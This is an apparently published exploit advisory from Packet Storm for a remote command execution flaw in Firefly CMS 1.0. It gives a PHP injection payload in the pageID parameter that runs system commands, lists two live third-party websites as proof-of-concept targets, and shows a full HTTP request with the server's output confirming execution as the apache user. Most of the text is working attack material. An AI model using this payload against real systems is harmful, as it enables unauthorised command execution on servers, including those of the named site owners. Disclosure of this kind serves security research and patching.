Firefly CMS 1.0 Remote Command Execution

🗓️ 13 May 2019 00:00:00Reported by Felipe Andrian PeixotoType

packetstorm🔗 packetstormsecurity.com👁 82 Views

Remote command execution vulnerability in Firefly CMS 1.

`[+] Remote Comand Execution on Firefly CMS v. 1.0  
  
[+] Date: 11/05/2019  
  
[+] CWE number: CWE-78  
  
[+] Risk: High  
  
[+] Author: Felipe Andrian Peixoto  
  
[+] Contact: [email protected]  
  
[+] Tested on: Windows 7 and Linux  
  
[+] Vendor Homepage: https://fireflydigital.com/  
  
[+] Vulnerable File: site.php  
  
[+] Version : 1.0  
  
[+] Exploit: http://host/patch/site.php?pageID={${system(%27id%27)}}  
  
[+] PoC: https://www.volalaw.com/site.php?pageID={${system(%27id%27)}}  
https://www.beltsforanything.com/site.php?pageID={${system(%27id%27)}}  
  
[+] Example Request:  
  
GET /site.php?pageID={${system(%27id%27)}} HTTP/1.1  
Host: www.volalaw.com  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate, br  
DNT: 1  
Connection: keep-alive  
Upgrade-Insecure-Requests: 1  
  
<html>  
<head>  
<title></title>  
<meta http-equiv="Content-Type" content="text/html;">  
<link rel="stylesheet" href="bug.css" type="text/css">  
</head>  
<body text="#000000" bgcolor="#F6EEE1" link="#008080" vlink="#808080" alink="#000080" background="templates/images/bkgd.jpg">  
  
<table border="0" width="100%" cellspacing="0" cellpadding="0" align="center">  
<tr valign="top">   
<td class="body_links">uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0  
</td>  
</tr>  
</table>  
</body>  
</html>  
  
[+] More About : http://cwe.mitre.org/data/definitions/78.html  
`

13 May 2019 00:00Current